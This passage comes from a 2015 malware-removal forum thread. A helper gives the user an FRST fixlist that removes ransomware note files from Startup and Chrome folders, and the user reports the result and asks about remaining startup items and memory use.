When the tool finishes, the zoek-results.log is opened in Notepad.
The log is also found on the systemdrive, normally C:\
If a reboot is needed, the log is opened after the reboot.

Please attach the zoek-results.log in your reply.

Also, please provide an update on how the computer is behaving after running the above script.

#13 snapjaw (Topic Starter, Members, 72 posts)

Posted 15 November 2015 - 03:48 PM

When I inputted the text and hit Run script I got this popup:

"No input found, or input.txt is too small !!!

What would you like to do?

1-Do a Quick Scan and Automated Cleanup
2-Perform only a Quick Scan
3-Perform only a Deep Scan
4-Do a Deep Scan and Automated Cleanup"



#14 nasdaq (Malware Response Team, 38,569 posts, Montreal, QC. Canada)

Posted 16 November 2015 - 09:05 AM

Forget about the Zoek fix.

Try this instead.

Press the Windows key + R on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and click OK.
Please copy the entire contents of the code box below to a new file.
 
start

CloseProcesses:

C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_wkbap.html
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_wkbap.txt
C:\Users\KW\AppData\Local\Google\Chrome\User Data\Default\Extensions\howto_recover_file_mbeso.html
C:\Users\KW\AppData\Local\Google\Chrome\User Data\Default\Extensions\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\Local\Google\Chrome\User Data\Default\Extensions\howto_recover_file_wkbap.html
C:\Users\KW\AppData\Local\Google\Chrome\User Data\Default\Extensions\howto_recover_file_wkbap.txt

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

Restart the computer normally to reset the registry.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

Keep me posted.

#15 snapjaw (Topic Starter, Members, 72 posts)

Posted 16 November 2015 - 03:14 PM

Ok I ran FRST with the code you provided. There are no more ransom notepads or internet browsers opening at startup. I do still get a flash of some window at startup. I looked in slo-mo video and it looks like it says WNDA3100 Smart Wizard. I think this is from a wireless adapter I tried to install a few years back but I don't think it installed correctly. Now my computer started at 29% physical memory; here is a pic of the processes.

[screenshot]

But it went to 39% once I opened Chrome to post this message.

[screenshot]

And here is a pic of my msconfig. You can see the WNDA3100 program there and also one called igfxcuiservice. I don't know what that one is.

[screenshot]

And come to think of it, I don't know if 40% physical memory is normal for my computer or not. It's been so long now that it could be my computer's capacity or maybe longstanding malware has just made me accustomed to it. And I did use to have 4 GB of RAM but one stick broke about 2 months ago while playing a game. Now I only have 2 GB.

Edited by snapjaw, 17 November 2015 - 01:49 AM.




